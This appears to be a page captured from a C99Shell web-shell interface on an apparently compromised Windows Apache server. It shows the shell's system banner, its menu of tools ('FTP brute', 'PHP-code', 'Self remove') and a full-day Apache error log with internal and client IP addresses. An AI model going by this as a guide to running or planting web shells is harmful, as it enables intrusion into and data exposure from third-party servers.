!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 8.02 GB of 239.26 GB (3.35%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     error.2021.09.29.log (230.07 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
[Wed Sep 29 00:04:16.097138 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 00:08:33.596190 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 00:08:49.555018 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 00:41:09.654435 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 00:44:59.962639 2021] [proxy:error] [pid 10816:tid 21096] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 172.22.1.51:8399 (172.22.1.51) failed
[Wed Sep 29 00:44:59.962639 2021] [proxy:error] [pid 10816:tid 21096] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.51) for 60s
[Wed Sep 29 00:44:59.962639 2021] [proxy_http:error] [pid 10816:tid 21096] [client 152.61.192.232:53791] AH01114: HTTP: failed to make connection to backend: 172.22.1.51
[Wed Sep 29 00:45:00.243440 2021] [proxy:error] [pid 10816:tid 21096] AH00940: HTTP: disabled connection for (172.22.1.51)
[Wed Sep 29 00:45:00.508640 2021] [proxy:error] [pid 10816:tid 21096] AH00940: HTTP: disabled connection for (172.22.1.51)
[Wed Sep 29 00:48:53.448650 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 00:53:50.647173 2021] [proxy:error] [pid 10816:tid 21040] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 172.22.1.51:8399 (172.22.1.51) failed
[Wed Sep 29 00:53:50.647173 2021] [proxy:error] [pid 10816:tid 21040] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.51) for 60s
[Wed Sep 29 00:53:50.647173 2021] [proxy_http:error] [pid 10816:tid 21040] [client 152.61.128.50:43649] AH01114: HTTP: failed to make connection to backend: 172.22.1.51
[Wed Sep 29 00:53:50.865574 2021] [proxy:error] [pid 10816:tid 21040] AH00940: HTTP: disabled connection for (172.22.1.51)
[Wed Sep 29 00:53:51.099574 2021] [proxy:error] [pid 10816:tid 21040] AH00940: HTTP: disabled connection for (172.22.1.51)
[Wed Sep 29 00:56:16.979431 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 01:15:56.383306 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 01:25:52.396155 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 01:31:01.345098 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 01:31:01.345098 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 01:37:24.019172 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 01:43:28.783414 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 01:48:30.106745 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 01:53:22.044059 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 01:56:57.188037 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 02:00:32.783816 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 02:03:38.785943 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 02:04:07.912194 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 02:05:03.106091 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 02:09:22.508347 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 02:47:45.384802 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 03:06:01.586131 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 03:11:39.031126 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 03:11:42.790733 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 03:28:48.544339 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 03:38:42.544983 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 03:38:44.120586 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 03:39:17.868846 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 04:03:56.477049 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 04:08:43.330753 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 04:13:47.888489 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 04:17:29.286281 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 04:20:26.443192 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 04:36:27.736683 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 04:47:41.950470 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 05:25:11.902032 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 05:28:03.163133 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 06:06:11.449160 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 07:33:25.284178 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 07:38:17.347291 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 07:44:46.931177 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 07:47:25.587456 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 07:47:34.963072 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 07:49:17.440652 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 07:52:14.317164 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 07:55:03.658462 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 07:57:58.847170 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 08:00:54.006679 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 08:03:49.199987 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 08:06:45.555697 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 08:09:51.512024 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 08:15:06.280178 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 08:15:28.759818 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 08:15:53.844662 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 08:20:56.490594 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 08:26:47.207811 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 08:27:13.588458 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 08:29:43.100521 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 08:32:38.464429 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 08:35:23.515120 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 08:37:37.391956 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 08:38:08.077210 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 08:38:08.077210 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 08:41:04.805524 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 08:41:43.353191 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 08:56:49.978186 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 08:59:00.038016 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 09:13:30.679351 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 09:13:57.090198 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 09:14:30.241256 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 09:23:02.990759 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 09:37:02.338836 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 10:03:38.303044 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 10:17:04.963464 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 10:20:00.634774 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 10:22:58.245086 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 10:27:25.930956 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 10:30:21.688266 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 10:36:13.786687 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 10:37:46.234449 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 10:39:10.569198 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 10:41:45.133670 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 10:44:03.680513 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 10:44:32.212963 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 10:48:53.326623 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 10:49:10.829854 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 10:50:25.353185 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 10:55:09.189485 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 10:56:04.258581 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 10:56:14.507799 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 10:59:11.736512 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 11:02:30.561262 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 11:06:47.576714 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 11:08:11.334261 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 11:10:45.653733 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 11:40:46.526103 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 13:49:57.122145 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 13:49:57.122145 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 13:49:57.153345 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 13:49:57.153345 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 13:56:15.074212 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 13:56:43.341461 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 13:57:43.917368 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 13:57:43.917368 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 13:57:43.948568 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 14:00:15.311034 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 14:00:35.420470 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 14:00:35.420470 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 14:01:04.172320 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 14:01:04.172320 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 14:01:23.906355 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 14:01:23.921955 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 14:01:23.921955 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 14:07:55.297843 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 14:07:59.151050 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 14:07:59.151050 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 14:07:59.166650 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 14:07:59.182250 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 14:07:59.182250 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 14:07:59.182250 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 14:17:23.692045 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 14:21:00.304826 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 14:25:28.942299 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 14:29:35.746134 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 14:45:43.577036 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 14:45:43.577036 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 14:45:43.608236 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 14:45:43.670637 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 14:46:04.715073 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 14:46:04.715073 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 14:46:04.715073 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 14:46:04.715073 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 14:46:04.715073 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 14:46:04.715073 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 14:46:04.746274 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 14:46:04.777474 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 14:46:04.793074 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 14:46:04.917874 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 15:10:40.864670 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 15:21:59.656666 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 15:22:15.008093 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 15:22:17.909698 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 15:30:46.858394 2021] [core:error] [pid 10816:tid 20908] [client 65.94.34.16:34500] AH00135: Invalid method in request MULI / HTTP/1.1
[Wed Sep 29 15:30:52.053203 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 15:30:52.053203 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 15:33:17.718659 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
